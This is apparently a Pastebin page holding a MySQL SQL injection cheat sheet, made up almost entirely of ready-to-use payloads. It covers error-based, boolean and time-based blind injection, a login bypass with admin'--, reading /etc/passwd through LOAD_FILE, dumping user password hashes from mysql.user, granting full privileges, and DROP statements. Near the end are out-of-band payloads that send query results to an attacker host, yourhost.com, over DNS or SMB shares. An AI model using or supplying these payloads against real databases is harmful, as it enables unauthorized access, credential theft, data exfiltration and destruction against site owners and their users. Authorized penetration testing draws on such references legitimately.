Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Initial Exploitation
- Back to top
- Version SELECT @@VERSION
- SELECT version()
- Current User SELECT user()
- SELECT system_user()
- Current Database SELECT database()
- Quick Detection
- Back to top
- Error Based SQLi For integer inputs:
- (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand( )*2))x from (select 1 union select 2)a group by x limit 1))
- For string inputs:
- '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand( )*2))x from (select 1 union select 2)a group by x limit 1))+'
- The attacks above should throw 'duplicate entry' errors.
- Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.
- product.php?id=4
- product.php?id=5-1
- product.php?id=4 OR 1=1
- product.php?id=-1 OR 17-7=10
- Blind SQL Injection (Time Based)
- Back to top
- ### Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached.
- ### This is just like sleep, wait for spesified time. CPU safe way to make database wait.
- SLEEP(25)--
- SELECT BENCHMARK(1000000,MD5('A'));
- Real World Samples ProductID=1 OR SLEEP(25)=0 LIMIT 1--
- ProductID=1) OR SLEEP(25)=0 LIMIT 1--
- ProductID=1' OR SLEEP(25)=0 LIMIT 1--
- ProductID=1') OR SLEEP(25)=0 LIMIT 1--
- ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
- ProductID=SELECT SLEEP(25)--
- Line Comments
- Back to top
- DROP sampletable;--
- DROP sampletable;#
- Username : admin'--
- : admin' or '1'='1'--
- SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'
- This is going to log you as admin user, because rest of the SQL query will be ignored.
- Inline Comments
- Back to top
- Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
- DROP/*comment*/sampletable
- DR/**/OP/*bypass blacklisting*/sampletable
- If Statements
- Back to top
- GET RESPONSE based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.
- MySQL If Statement
- IF condition true-part ELSE false-part
- SELECT IF (1=1, ‘true’, ‘false’)
- If Statement SQL Injection Attack Samples
- SELECT IF(user()='root@localhost','true','false')
- String without Quotes
- Back to top
- SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
- This will return ‘KLM’.
- Bulk Insert
- Back to top
- Insert a file content to a table.
- SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --
- Load File
- Back to top
- ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
- SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
- This will show the content of c:\boot.ini
- Command Execution
- Back to top
- Possible with using UDF (user defined functions).
- http://packetstormsecurity.org/libra...s_0.0.3.tar.gz
- Create Users
- Back to top
- CREATE USER username IDENTIFIED BY 'password'; --
- Drop Users
- Back to top
- DROP USER username; --
- Make User DBA
- Back to top
- GRANT ALL PRIVILEGES ON *.* TO username@'%';
- List Users
- Back to top
- SELECT * FROM 'user' WHERE 1 LIMIT 0,30
- SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
- SELECT * FROM mysql.user
- List Passwords
- Back to top
- SELECT user, password FROM mysql.user
- SELECT user, password FROM mysql.user LIMIT 1,1
- SELECT password FROM mysql.user WHERE user = 'root'
- List Databases
- Back to top
- SELECT schema_name FROM information_schema.schemata;
- SELECT schema_name FROM information_schema.schemata LIMIT 1,1;
- Privileges
- Back to top
- SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
- SELECT Super_priv FROM mysql.user WHERE user= ‘root’ LIMIT 1,1--
- Getting user defined tables
- Back to top
- SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
- tblUsers -> tablename
- Getting Column Names
- Back to top
- SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’
- tblUsers -> tablename
- SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
- find table which have a column called 'username'
- Default Databases
- Back to top
- information_schema (>= mysql 5.0)
- mysql
- Path of DB files
- Back to top
- SELECT @@datadir
- C:\AppServ\MySQL\data\
- Time Based SQLi Exploitation
- Back to top
- ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
- {INJECTION} = You want to run the query.
- If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
- Out of Band Channel
- Back to top
- ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\'))) Makes a NBNS query request/DNS resolution request to yourhost.com
- ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\ SHARE\\output.txt') Writes data to your shared folder/file
- {INJECTION} = You want to run the query.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement